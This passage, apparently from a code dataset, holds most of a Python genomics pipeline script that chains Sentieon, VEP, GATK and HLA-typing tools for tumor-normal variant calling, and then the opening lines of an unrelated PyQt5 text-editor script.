default=f'{tumor_sample}.contamination.data', desc='output file containing the contamination information produced by ContaminationModel')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n cmd.outputs['orientation_data'] = Output(value='{orientation_data}')\n cmd.outputs['tumor_segments'] = Output(value='{tumor_segments}')\n cmd.outputs['contamination_data'] = Output(value='{contamination_data}')\n return cmd\n\n\ndef TNfilter(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'TNfilter'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['method'] = Argument(type='fix', value='--algo TNfilter')\n cmd.args['tumor_sample'] = Argument(prefix='--tumor_sample ', desc='tumor sample name', default=tumor_sample)\n cmd.args['normal_sample'] = Argument(prefix='--normal_sample ', level='optional', desc='normal sample name')\n cmd.args['tmp_vcf'] = Argument(prefix='-v ', type='infile', desc='vcf file from TNhaplotyper2')\n cmd.args['contamination'] = Argument(prefix='--contamination ', type='infile', level='optional', desc='file containing the contamination information produced by ContaminationModel')\n cmd.args['tumor_segments'] = Argument(prefix='--tumor_segments ', type='infile', level='optional', desc='file containing the tumor segments information produced by ContaminationModel')\n cmd.args['orientation_data'] = Argument(prefix='--orientation_priors ', type='infile', level='optional', desc='file containing the orientation bias information produced by OrientationBias')\n cmd.args['out_vcf'] = Argument(desc='final output vcf', value=f'{tumor_sample}.somatic.vcf.gz')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n return cmd\n\n\ndef Haplotyper(normal_sample):\n cmd = Command()\n cmd.meta.name = 'Haplotyper'\n cmd.runtime.image = 'registry-xdp-v3-yifang.xdp.basebit.me/basebitai/sentieon:202010.02'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='reccaled tumor and normal bam list')\n cmd.args['recal_data'] = Argument(prefix='-q ', type='infile', desc='tumor and normal recal data list')\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['method'] = Argument(type='fix', value='--algo Haplotyper')\n cmd.args['emit_mode'] = Argument(prefix='--emit_mode ', default='gvcf', desc='determines what calls will be emitted. possible values:variant,confident,all,gvcf')\n cmd.args['ploidy'] = Argument(prefix='--ploidy ', type='int', default=2, desc='determines the ploidy number of the sample being processed. The default value is 2.')\n cmd.args['out_vcf'] = Argument(value=f'{normal_sample}.g.vcf.gz', desc='output vcf file')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n cmd.outputs['out_vcf_idx'] = Output(value='{out_vcf}.tbi')\n return cmd\n\n\ndef GVCFtyper(normal_sample):\n cmd = Command()\n cmd.meta.name = 'GVCFtyper'\n cmd.runtime.image = 'registry-xdp-v3-yifang.xdp.basebit.me/basebitai/sentieon:202010.02'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['method'] = Argument(type='fix', value='--algo GVCFtyper')\n cmd.args['in_gvcf'] = Argument(prefix='-v ', type='infile', multi_times=True, desc='input gvcf file')\n cmd.args['known_dbsnp'] = Argument(prefix='-d ', type='infile', desc='dbsnp file')\n cmd.args['call_conf'] = Argument(prefix='--call_conf ', type='int', default=30, desc=\"determine the threshold of variant quality to emit a variant. Variants with quality less than CONFIDENCE will be not be added to the output VCF file.\")\n cmd.args['genotype_model'] = Argument(prefix='--genotype_model ', range={\"coalescent\", \"multinomial\"}, default='multinomial', desc=\"determines which model to use for genotyping and QUAL calculation\")\n cmd.args['out_vcf'] = Argument(value=f'{normal_sample}.germline.vcf.gz', desc='output vcf file')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n cmd.outputs['out_vcf_idx'] = Output(value='{out_vcf}.tbi')\n return cmd\n\n\ndef vep(sample):\n cmd = Command()\n cmd.meta.name = 'VEP'\n cmd.runtime.image = 'ensemblorg/ensembl-vep:2.0.3'\n cmd.runtime.tool = 'vep'\n cmd.args['input_file'] = Argument(prefix='-i ', type='infile', desc='input file')\n cmd.args['fasta'] = Argument(prefix='--fasta ', type='infile', desc=\"Specify a FASTA file or a directory containing FASTA files to use to look up reference sequence. The first time you run VEP with this parameter an index will be built which can take a few minutes. This is required if fetching HGVS annotations (--hgvs) or checking reference sequences (--check_ref) in offline mode (--offline), and optional with some performance increase in cache mode (--cache).\")\n cmd.args['output_file'] = Argument(prefix='-o ', default=f'{sample}.vep.vcf.gz', desc='output file')\n cmd.args['output_format'] = Argument(prefix='--', range={'vcf', 'json', 'tab'}, default='vcf', desc=\"If we choose to write output in VCF format. Consequences are added in the INFO field of the VCF file, using the key 'CSQ'. Data fields are encoded separated by '|'; the order of fields is written in the VCF header. Output fields in the 'CSQ' INFO field can be selected by using --fields.\")\n cmd.args['compress_output'] = Argument(prefix='--compress_output ', default='bgzip', desc=\"Writes output compressed using either gzip or bgzip\")\n cmd.args['force_overwrite'] = Argument(prefix=\"--force_overwrite \", type='bool', default=True, desc=\"Force overwriting of output file\")\n cmd.args['fork'] = Argument(prefix='--fork ', type='int', default=7, desc='Use forking(multi-cpu/threads) to improve script runtime')\n cmd.args['species'] = Argument(prefix='--species ', default='homo_sapiens', desc='Species for your data. This can be the latin name e.g. homo_sapiens or any Ensembl alias e.g. mouse.')\n cmd.args['assembly_version'] = Argument(prefix='--assembly ', default='GRCh37', desc='Select the assembly version to use if more than one available.')\n cmd.args['dir_cache'] = Argument(prefix='--dir_cache ', type='indir', desc='Specify the cache directory to use')\n cmd.args['dir_plugins'] = Argument(prefix='--dir_plugins ', type='indir', desc='Specify the plugin directory to use')\n cmd.args['stats_file'] = Argument(prefix='--stats_file ', default=f'{sample}.vep.summary.html', desc='Summary stats file name. This is an HTML file containing a summary of the VEP run - the file name must end with <.html>.')\n cmd.args['cache'] = Argument(prefix='--cache ', type='bool', default=True, desc='Enables use of cache')\n cmd.args['offline'] = Argument(prefix='--offline ', type='bool', default=True, desc='Enables offline mode. No database connections, and a cache file or GFF/GTF file is required for annotation')\n cmd.args['merged'] = Argument(prefix='--merged ', type='bool', default=False, desc='Use the merged Ensembl and RefSeq cache. Consequences are flagged with the SOURCE of each transcript used.')\n cmd.args['plugins'] = Argument(prefix='--plugin ', multi_times=True, default=['Frameshift', 'Wildtype'], desc='Use named plugin. Plugin modules should be installed in the Plugins subdirectory of the VEP cache directory.Multiple plugins can be used by supplying the --plugin flag multiple times')\n cmd.args['variant_class'] = Argument(prefix='--variant_class ', type='bool', default=True, desc='Output the Sequence Ontology variant class.')\n cmd.args['sift'] = Argument(prefix='--sift ', default='b', range={'p', 's', 'b'}, desc=\"Species limited SIFT predicts whether an amino acid substitution affects protein function based on sequence homology and the physical properties of amino acids. VEP can output the prediction term, score or both.\")\n cmd.args['polyphen'] = Argument(prefix='--polyphen ', default='b', range={'p', 's', 'b'}, desc=\"Human only PolyPhen is a tool which predicts possible impact of an amino acid substitution on the structure and function of a human protein using straightforward physical and comparative considerations. VEP can output the prediction term, score or both.\")\n cmd.args['nearest'] = Argument(prefix='--nearest ', default='transcript', range={'transcript', 'gene', 'symbol'}, desc='Retrieve the transcript or gene with the nearest protein-coding transcription start site (TSS) to each input variant. Use transcript to retrieve the transcript stable ID, gene to retrieve the gene stable ID, or symbol to retrieve the gene symbol. Note that the nearest TSS may not belong to a transcript that overlaps the input variant, and more than one may be reported in the case where two are equidistant from the input coordinates.')\n cmd.args['gene_phenotype'] = Argument(prefix='--gene_phenotype ', type='bool', default=True, desc='Indicates if the overlapped gene is associated with a phenotype, disease or trait.')\n cmd.args['regulatory'] = Argument(prefix='--regulatory ', type='bool', default=True, desc=\"Look for overlaps with regulatory regions. VEP can also report if a variant falls in a high information position within a transcription factor binding site. Output lines have a Feature type of RegulatoryFeature or MotifFeature.\")\n cmd.args['phased'] = Argument(prefix='--phased ', type='bool', default=True, desc=\"Force VCF genotypes to be interpreted as phased. For use with plugins that depend on phased data.\")\n cmd.args['numbers'] = Argument(prefix='--numbers ', type='bool', default=True, desc=\"Adds affected exon and intron numbering to to output. Format is Number/Total\")\n cmd.args['hgvs'] = Argument(prefix='--hgvs ', type='bool', default=True, desc=\"Add HGVS nomenclature based on Ensembl stable identifiers to the output. Both coding and protein sequence names are added where appropriate.\")\n cmd.args['transcript_version'] = Argument(prefix='--transcript_version ', type='bool', default=True, desc=\"Add version numbers to Ensembl transcript identifiers\")\n cmd.args['symbol'] = Argument(prefix='--symbol ', type='bool', default=True, desc=\"Adds the gene symbol (e.g. HGNC) (where available) to the output.\")\n cmd.args['tsl'] = Argument(prefix='--tsl ', type='bool', default=True, desc=\"Adds the transcript support level for this transcript to the output.\")\n cmd.args['canonical'] = Argument(prefix='--canonical ', type='bool', default=True, desc=\"Adds a flag indicating if the transcript is the canonical transcript for the gene\")\n cmd.args['biotype'] = Argument(prefix='--biotype ', type='bool', default=True, desc=\"Adds the biotype of the transcript or regulatory feature.\")\n cmd.args['max_af'] = Argument(prefix='--max_af ', type='bool', default=True, desc=\"Report the highest allele frequency observed in any population from 1000 genomes, ESP or gnomAD\")\n cmd.args['af_1kg'] = Argument(prefix='--af_1kg ', type='bool', default=True, desc=\"Add allele frequency from continental populations (AFR,AMR,EAS,EUR,SAS) of 1000 Genomes Phase 3 to the output.\")\n cmd.args['af_gnomad'] = Argument(prefix='--af_gnomad ', type='bool', default=True, desc=\"Include allele frequency from Genome Aggregation Database (gnomAD) exome populations. Note only data from the gnomAD exomes are included\")\n cmd.args['af_esp'] = Argument(prefix='--af_esp ', type='bool', default=False, desc=\"Include allele frequency from NHLBI-ESP populations.\")\n cmd.args['coding_only'] = Argument(prefix='--af_esp ', type='bool', default=False, desc=\"Only return consequences that fall in the coding regions of transcripts. Not used by default\")\n cmd.args['pick'] = Argument(prefix='--pick', type='bool', default=False, desc=\"Pick one line or block of consequence data per variant, including transcript-specific columns. This is the best method to use if you are interested only in one consequence per variant\")\n cmd.args['flag_pick'] = Argument(prefix='--flag_pick ', type='bool', default=True, desc=\"As per --pick, but adds the PICK flag to the chosen block of consequence data and retains others.\")\n cmd.args['filter_common'] = Argument(prefix='--filter_common ', type='bool', default=False, desc=\"Shortcut flag for the filters below - this will exclude variants that have a co-located existing variant with global AF > 0.01 (1%). May be modified using any of the following freq_* filters.\")\n cmd.args['other_args'] = Argument(default='', desc='specify other arguments that you want to append to the command')\n cmd.args['_create_index'] = Argument(value='&& tabix *vcf.gz', type='fix')\n cmd.outputs['out_vcf'] = Output(value='{output_file}')\n cmd.outputs['out_vcf_idx'] = Output(value='{output_file}.tbi')\n return cmd\n\n\ndef CombineVariants(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'CombineVariants'\n cmd.meta.desc = \"Combine variants\"\n cmd.runtime.image = 'broadinstitute/gatk3:3.8-1'\n cmd.runtime.tool = 'java -Xmx10g -jar GenomeAnalysisTK.jar -T CombineVariants'\n cmd.args['ref'] = Argument(prefix='-R ', type='infile', desc='reference fasta file')\n cmd.args['variant'] = Argument(prefix='--variant ', multi_times=True, type='infile', desc='variant vcf file array')\n cmd.args['out_vcf'] = Argument(prefix='-o ', value=f'{tumor_sample}.combined_germline.vcf')\n cmd.args['assumeIdenticalSamples'] = Argument(prefix='--assumeIdenticalSamples', type='bool', desc='If true, assume input VCFs have identical sample sets and disjoint calls. This option allows the user to perform a simple merge (concatenation) to combine the VCFs.')\n cmd.outputs['combined_vcf'] = Output(value='{out_vcf}')\n return cmd\n\n\ndef SortVcf(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'SortVcf'\n cmd.meta.desc = \"sort vcf\"\n cmd.runtime.image = 'broadinstitute/picard:latest'\n cmd.runtime.tool = 'java -jar /usr/picard/picard.jar SortVcf'\n cmd.args['in_vcf'] = Argument(prefix='I=', type='infile', desc='input vcf to sort')\n cmd.args['out_vcf'] = Argument(prefix='O=', value=f'{tumor_sample}.combined_germline.sorted.vcf', type='infile', desc='output sorted vcf')\n cmd.outputs['sorted_vcf'] = Output(value='{out_vcf}')\n return cmd\n\n\ndef ReadBackedPhasing(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'ReadBackedPhasing'\n cmd.meta.desc = \"ReadBackedPhasing\"\n cmd.runtime.image = 'broadinstitute/gatk3:3.8-1'\n cmd.runtime.tool = 'java -Xmx10g -jar GenomeAnalysisTK.jar -T ReadBackedPhasing'\n cmd.args['ref'] = Argument(prefix='-R ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-I ', type='infile', desc='tumor bam file')\n cmd.args['variant'] = Argument(prefix='--variant ', type='infile', desc='input vcf file')\n cmd.args['interval'] = Argument(prefix='-L ', type='infile', desc='input vcf file')\n cmd.args['out_vcf'] = Argument(prefix='-o ', value=f'{tumor_sample}.phased.vcf', desc='output vcf file')\n cmd.outputs['phased_vcf'] = Output(value='{out_vcf}')\n return cmd\n\n\ndef HLA_ABC_typer(sample):\n cmd = Command()\n cmd.meta.name = 'OptiType'\n cmd.meta.desc = \"OptiType:4-digit HLA typer\"\n cmd.runtime.image = 'fred2/optitype:1.3.1'\n cmd.runtime.tool = 'OptiTypePipeline.py'\n cmd.args['reads'] = Argument(prefix='--input ', type='infile', array=True, desc='fastq file(s) (fished or raw) or .bam files stored for re-use, generated by an earlier OptiType run.')\n cmd.args['is_dna'] = Argument(prefix='--dna', type='bool', default=True, desc='use with DNA sequencing data')\n cmd.args['is_rna'] = Argument(prefix='--rna', type='bool', default=False, desc='use with RNA sequencing data')\n cmd.args['enumerate'] = Argument(prefix='--enumerate ', type='int', default=1, desc='Number of enumerations. OptiType will output the optimal solution and the top N-1 suboptimal solutions in the results CSV.')\n cmd.args['outdir'] = Argument(prefix='--outdir ', default='.', desc='Specifies the out directory to which all files should be written.')\n cmd.args['prefix'] = Argument(prefix='--prefix ', value=sample, desc='prefix of output files')\n cmd.args['config'] = Argument(prefix='--config ', default='config.ini', desc='config.ini file')\n cmd.outputs['result_tsv'] = Output(value='{prefix}_result.tsv')\n cmd.outputs['result_pdf'] = Output(value='{prefix}_coverage_plot.pdf')\n return cmd\n\n\ndef hisat_genotype():\n \"\"\"\n hisatgenotype --base hla --locus-list A,B,C,DRB1,DQA1 -1 ILMN/NA12892.extracted.1.fq.gz -2 ILMN/NA12892.extracted.2.fq.gz\n hisatgenotype_toolkit parse-results --csv --in-dir hisatgenotype_out\n \"\"\"\n cmd = Command()\n cmd.meta.name = 'HisatGenotype'\n cmd.meta.desc = \" HLA-typing using hisat\"\n cmd.runtime.image = ''\n cmd.runtime.tool = 'hisatgenotype'\n cmd.runtime.cpu = 6\n cmd.runtime.memory = 8*1024**3\n cmd.args['base'] = Argument(prefix='--base ', default='hla', desc='Base file name for index, variants, haplotypes, etc. (e.g. hla, rbg, codis)')\n cmd.args['locus'] = Argument(prefix='--locus-list ', level='optional', array=True, delimiter=',', desc='A comma-separated list of gene names (default: empty, all genes)')\n cmd.args['read1'] = Argument(prefix='-1 ', type='infile', desc='read1 fastq file')\n cmd.args['read2'] = Argument(prefix='-2 ', type='infile', desc='read2 fastq file')\n cmd.args['_read_dir'] = Argument(prefix='--in-dir ', value='/', type='fix')\n cmd.args['threads'] = Argument(prefix='--threads ', default=5, desc='Number of threads')\n cmd.args['hisat_threads'] = Argument(prefix='--pp ', default=7, desc='Number of threads')\n cmd.args['indicies'] = Argument(prefix='--index_dir ', level='optional', type='indir', desc=\"Set location to use for indicies\")\n cmd.args['_outdir'] = Argument(prefix='--out-dir ', value='./', type='fix')\n cmd.args['_parse_result'] = Argument(value='&& hisatgenotype_toolkit parse-results --csv --in-dir .', type='fix')\n cmd.args['level'] = Argument(prefix='-t ', default=2, desc='Trim allele to specific field level (example : A*01:01:01:01 trim 2 A*01:01)')\n cmd.args['out'] = Argument(prefix='--output-file ', desc='output of csv file')\n cmd.outputs['out'] = Output(value='{out}', type='outfile')\n return cmd\n\n\ndef pipeline():\n wf = Workflow()\n wf.meta.name = 'DNAseqPipeline'\n wf.meta.desc = 'typical bioinformatics pipeline using sentieon TNSeq and VEP, including HLA-typing'\n wf.init_argparser()\n wf.add_argument('-fastq_info', nargs='+', required=True, help='A list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json]')\n wf.add_argument('-r1_name', default='(.*).R1.fastq', help=\"python regExp that describes the full name of read1 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R1.fq.gz'\")\n wf.add_argument('-r2_name', default='(.*).R2.fastq', help=\"python regExp that describes the full name of read2 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R2.fq.gz'\")\n wf.add_argument('-exclude_samples', default=tuple(), nargs='+', help='samples to exclude from analysis')\n wf.add_argument('-pair_info', required=True, help='tumor normal pair info, two-column txt file, first column is tumor sample name. sample not in pair info will be skipped')\n wf.add_argument('-sentieon_threads', default=4, help='threads number used in sentieon')\n wf.add_argument('--realign', default=False, action='store_true', help='if to realign indel region')\n wf.add_argument('-ref', required=True, help='reference fasta file, require bwa index being created')\n wf.add_argument('-dbsnp', required=True, help='dbsnp vcf file')\n wf.add_argument('-known_indels', required=True, help='high confidence known indel vcf file')\n wf.add_argument('-known_mills', required=True, help='high confidence known indel vcf file')\n wf.add_argument('-pon', required=False, help='panel of normal vcf file for germline variant filtering, this will be required for tumor only analysis')\n wf.add_argument('-germline_vcf', required=False, help='germline vcf, will be used for germline variant filtering and contamination analysis')\n wf.add_argument('-vep_cache_dir', required=False, help='VEP cache directory')\n wf.add_argument('-vep_plugin_dir', required=False, help='VEP plugin directory')\n wf.add_argument('-intervals', required=False, help=\"interval file, support bed file or picard interval or vcf format. 如果不提供该参数,建议跳过coverage分析\")\n wf.add_argument('-hisatgenotype_db', required=False, help='indicies dir of hisat-genotype for HLA typing')\n wf.parse_args()\n\n top_vars = dict(\n thread_number=TopVar(value=wf.args.sentieon_threads, type='int'),\n ref=TopVar(value=wf.args.ref, type='infile'),\n known_dbsnp=TopVar(value=wf.args.dbsnp, type='infile'),\n known_indels=TopVar(value=wf.args.known_indels, type='infile'),\n known_mills=TopVar(value=wf.args.known_mills),\n pon=TopVar(value=wf.args.pon),\n germline_vcf=TopVar(value=wf.args.germline_vcf),\n vep_cache_dir=TopVar(value=wf.args.vep_cache_dir, type='indir'),\n vep_plugin_dir=TopVar(value=wf.args.vep_plugin_dir, type='indir'),\n intervals=TopVar(value=wf.args.intervals, type='infile'),\n hisatgenotype_db=TopVar(value=wf.args.hisatgenotype_db, type='infile')\n )\n wf.add_topvars(top_vars)\n\n fastq_info = get_fastq_info(fastq_info=wf.args.fastq_info, r1_name=wf.args.r1_name, r2_name=wf.args.r2_name)\n if len(fastq_info) <= 0:\n raise Exception('No fastq file found !')\n\n pair_list = []\n sample_list = []\n if wf.args.pair_info:\n with open(wf.args.pair_info) as f:\n for line in f:\n if line.strip():\n pairs = line.strip('\\n').split('\\t')[:2]\n pair_list.append(pairs)\n sample_list.extend(pairs)\n\n recal_dict = dict()\n bam_dict = dict()\n # batch是分组信息,用于wdl的scatter判断\n for sample, (r1s, r2s) in fastq_info.items():\n if sample in wf.args.exclude_samples or (sample not in sample_list):\n continue\n if len(r1s) > 1:\n print(f'Warn: We can use only one fastq file of {sample}, you should merge them first.')\n read1 = r1s[0] # 假设每个样本只有对应一对fastq文件,不存在1对多的情况\n read2 = r2s[0] # 假设每个样本只有对应一对fastq文件,不存在1对多的情况\n\n # fastp\n fastp_task, args = wf.add_task(fastp(sample), name=f'fastp-{sample}')\n args['read1'].value = TmpVar(name='read1', value=read1, type='infile')\n args['read2'].value = TmpVar(name='read2', value=read2, type='infile')\n\n # optiType\n # task, args = wf.add_task(HLA_ABC_typer(sample), name=f'optiType-{sample}', depends=[fastp_task.task_id])\n # args['reads'].value = [fastp_task.outputs['out1'], fastp_task.outputs['out2']]\n\n # hisat-genotype\n if wf.args.hisatgenotype_db:\n task, args = wf.add_task(hisat_genotype(), name=f'hisatGenotype-{sample}', depends=[fastp_task.task_id])\n args['read1'].value = fastp_task.outputs['out1']\n args['read2'].value = fastp_task.outputs['out2']\n args['indicies'].value = top_vars['hisatgenotype_db']\n args['out'].value = f'{sample}.HLA-gene-type.txt'\n\n # mapping\n mapping, args = wf.add_task(bwa_mem(sample, platform='ILLUMINA'), name=f'bwaMem-{sample}', depends=[fastp_task.task_id])\n args['t'].value = top_vars['thread_number']\n args['ref'].value = top_vars['ref']\n args['ref2'].value = top_vars['ref']\n args['read1'].value = fastp_task.outputs['out1']\n args['read2'].value = fastp_task.outputs['out2']\n args['t2'].value = top_vars['thread_number']\n\n # get_metrics\n task, args = wf.add_task(get_metrics(sample), name=f'getMetrics-{sample}', depends=[mapping.task_id])\n args['intervals'].value = [top_vars['intervals']]\n args['t'].value = top_vars['thread_number']\n args['ref'].value = top_vars['ref']\n args['bam'].value = mapping.outputs['out']\n get_metrics_task_id = task.task_id\n\n # plot\n depend_task = task\n task, args = wf.add_task(plot_metrics(sample, method='GCBias'), name=f'plotGCBias-{sample}', depends=[get_metrics_task_id])\n task.cmd.meta.name = 'plotGCBias'\n args['i'].value = depend_task.outputs['gc_metrics']\n\n task, args = wf.add_task(plot_metrics(sample, method='MeanQualityByCycle'), name=f'plotMeanQual-{sample}', depends=[get_metrics_task_id])\n task.cmd.meta.name = 'plotMeanQualityByCycle'\n args['i'].value = depend_task.outputs['mq_metrics']\n\n task, args = wf.add_task(plot_metrics(sample, method='QualDistribution'), name=f'plotQualDistr-{sample}', depends=[get_metrics_task_id])\n task.cmd.meta.name = 'plotQualDistribution'\n args['i'].value = depend_task.outputs['qd_metrics']\n\n task, args = wf.add_task(plot_metrics(sample, method='InsertSizeMetricAlgo'), name=f'plotInsertSize-{sample}', depends=[get_metrics_task_id])\n task.cmd.meta.name = 'plotInsertSize'\n args['i'].value = depend_task.outputs['insert_metrics']\n\n # locus\n locus_get, args = wf.add_task(locus_collector(sample), name=f'locusCollector-{sample}', depends=[mapping.task_id])\n args['t'].value = top_vars['thread_number']\n args['bam'].value = mapping.outputs['out']\n\n # dedup\n dedup_task, args = wf.add_task(dedup(sample), name=f'dedup-{sample}', depends=[mapping.task_id, locus_get.task_id])\n args['t'].value = top_vars['thread_number']\n args['bam'].value = mapping.outputs['out']\n args['score'].value = locus_get.outputs['score']\n\n # coverage, 如果不提供intervals,不建议该步骤,因为耗时长,输出结果巨大\n cov_task, args = wf.add_task(coverage_metrics(sample), name=f'covMetrics-{sample}', depends=[dedup_task.task_id])\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bam'].value = dedup_task.outputs['out_bam']\n args['ref'].value = top_vars['ref']\n\n # realign\n if wf.args.realign:\n realign_task, args = wf.add_task(realign(sample), name=f'realign-{sample}', depends=[dedup_task.task_id])\n args['t'].value = top_vars['thread_number']\n args['bam'].value = dedup_task.outputs['out_bam']\n args['ref'].value = top_vars['ref']\n args['database'].value = [top_vars['known_indels'], top_vars['known_mills']]\n\n # recalibration\n depend_task = realign_task if wf.args.realign else dedup_task\n recal_task, args = wf.add_task(recalibration(sample), name=f'recal-{sample}', depends=[depend_task.task_id])\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bam'].value = depend_task.outputs['out_bam']\n args['ref'].value = top_vars['ref']\n args['database'].value = [top_vars['known_dbsnp'], top_vars['known_indels'], top_vars['known_mills']]\n recal_dict[sample] = recal_task\n bam_dict[sample] = depend_task\n\n if not bam_dict:\n raise Exception('No sample found in Pair info file')\n\n for tumor_sample, normal_sample in pair_list:\n if tumor_sample not in bam_dict and tumor_sample.lower() != 'none':\n print(f'Warning: skip tumor sample {tumor_sample} since it is not in target list: {list(bam_dict.keys())}')\n continue\n if normal_sample not in bam_dict and normal_sample.lower() != 'none':\n print(f'Warning: skip normal sample {normal_sample} since it is not in target list: {list(bam_dict.keys())}')\n continue\n\n # germline variant calling\n if normal_sample.lower() != 'none':\n # haplotyper\n hap_task, args = wf.add_task(Haplotyper(normal_sample), name=f'haplotyper-{normal_sample}',\n depends=[bam_dict[normal_sample].task_id, recal_dict[normal_sample].task_id])\n args['ref'].value = top_vars['ref']\n args['bam'].value = bam_dict[normal_sample].outputs['out_bam']\n args['recal_data'].value = recal_dict[normal_sample].outputs['recal_data']\n args['intervals'].value = [top_vars['intervals']]\n args['emit_mode'].value = 'gvcf'\n\n # gvcf-typer\n germline_task, args = wf.add_task(GVCFtyper(normal_sample), name=f'gvcfTyper-{normal_sample}', depends=[hap_task.task_id])\n args['ref'].value = top_vars['ref']\n args['known_dbsnp'].value = top_vars['known_dbsnp']\n args['in_gvcf'].value = [hap_task.outputs['out_vcf']]\n\n # vep annotation\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(normal_sample), name=f'vep-{normal_sample}',\n depends=[germline_task.task_id])\n args['input_file'].value = germline_task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n args['filter_common'].value = False\n\n # tumor-normal pair calling\n if normal_sample.lower() != 'none' and tumor_sample.lower() != 'none':\n task, args = wf.add_task(TNhaplotyper2(tumor_sample=tumor_sample), name=f'TNhaplotyper2-{tumor_sample}')\n task.depends = [bam_dict[normal_sample].task_id, bam_dict[tumor_sample].task_id]\n task.depends += [recal_dict[normal_sample].task_id, recal_dict[tumor_sample].task_id]\n args['ref'].value = top_vars['ref']\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bams'].value = [bam_dict[normal_sample].outputs['out_bam'], bam_dict[tumor_sample].outputs['out_bam']]\n args['recal_datas'].value = [recal_dict[normal_sample].outputs['recal_data'], recal_dict[tumor_sample].outputs['recal_data']]\n args['normal_sample'].value = normal_sample\n # pon and germline\n args['pon'].value = top_vars['pon']\n args['germline_vcf'].value = top_vars['germline_vcf']\n # orientation\n args['orientation_sample'].value = tumor_sample\n args['orientation_data'].value = f'{tumor_sample}.orientation.data'\n # contamination\n if wf.args.germline_vcf:\n args['germline_vcf2'].value = top_vars['germline_vcf']\n args['contamination_tumor'].value = tumor_sample\n args['contamination_normal'].value = normal_sample\n args['contamination_data'].value = f'{tumor_sample}.contamination.data'\n args['tumor_segments'].value = f'{tumor_sample}.contamination.segments'\n\n # filter\n depend_task = task\n filter_task, args = wf.add_task(TNfilter(tumor_sample), name=f'tnfilter-{tumor_sample}', depends=[depend_task.task_id])\n args['ref'].value = top_vars['ref']\n args['normal_sample'].value = normal_sample\n args['tmp_vcf'].value = depend_task.outputs['out_vcf']\n if wf.args.germline_vcf:\n args['contamination'].value = depend_task.outputs['contamination_data']\n args['tumor_segments'].value = depend_task.outputs['tumor_segments']\n args['orientation_data'].value = depend_task.outputs['orientation_data']\n\n # annotation of somatic variant with VEP\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(tumor_sample), name=f'vep-{tumor_sample}', depends=[filter_task.task_id])\n args['input_file'].value = filter_task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n\n # tumor only analysis\n if normal_sample.lower() == 'none' and tumor_sample.lower() != 'none':\n task, args = wf.add_task(TNhaplotyper2(tumor_sample=tumor_sample), name=f'TNhaplotyper2-{tumor_sample}')\n task.depends = [bam_dict[tumor_sample].task_id]\n task.depends += [recal_dict[tumor_sample].task_id]\n args['ref'].value = top_vars['ref']\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bams'].value = [bam_dict[tumor_sample].outputs['out_bam']]\n args['recal_datas'].value = [recal_dict[tumor_sample].outputs['recal_data']]\n # pon and germline\n args['pon'].value = top_vars['pon']\n args['germline_vcf'].value = top_vars['germline_vcf']\n\n # annotation of somatic variant with VEP\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(tumor_sample), name=f'vep-{tumor_sample}', depends=[task.task_id])\n args['input_file'].value = task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n\n # run workflow\n wf.run()\n\n\nif __name__ == '__main__':\n pipeline()\n","repo_name":"gudeqing/basefly","sub_path":"dnaseq/dnaseq.py","file_name":"dnaseq.py","file_ext":"py","file_size_in_byte":47497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10720428690","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\r\nfrom PyQt5.uic import loadUi\r\nimport sys\r\n\r\nclass Main(QMainWindow):\r\n def __init__(self):\r\n super(Main, self).__init__()\r\n loadUi(\"main.ui\", self)\r\n \r\n self.current_path = None \r\n self.current_fontsize = 8\r\n self.setWindowTitle(\"Untitled\")\r\n \r\n self.actionNew.triggered.connect(self.newFile)\r\n self.actionSave.triggered.connect(self.saveFile)\r\n self.actionSave_as.triggered.connect(self.saveFileAs)\r\n self.actionOpen.triggered.connect(self.openFile)\r\n self.actionUndo.triggered.connect(self.undo)\r\n self.actionRedo.triggered.connect(self.redo)\r\n self.actionCut.triggered.connect(self.cut)\r\n self.actionCopy.triggered.connect(self.copy)\r\n self.actionPaste.triggered.connect(self.paste)\r\n 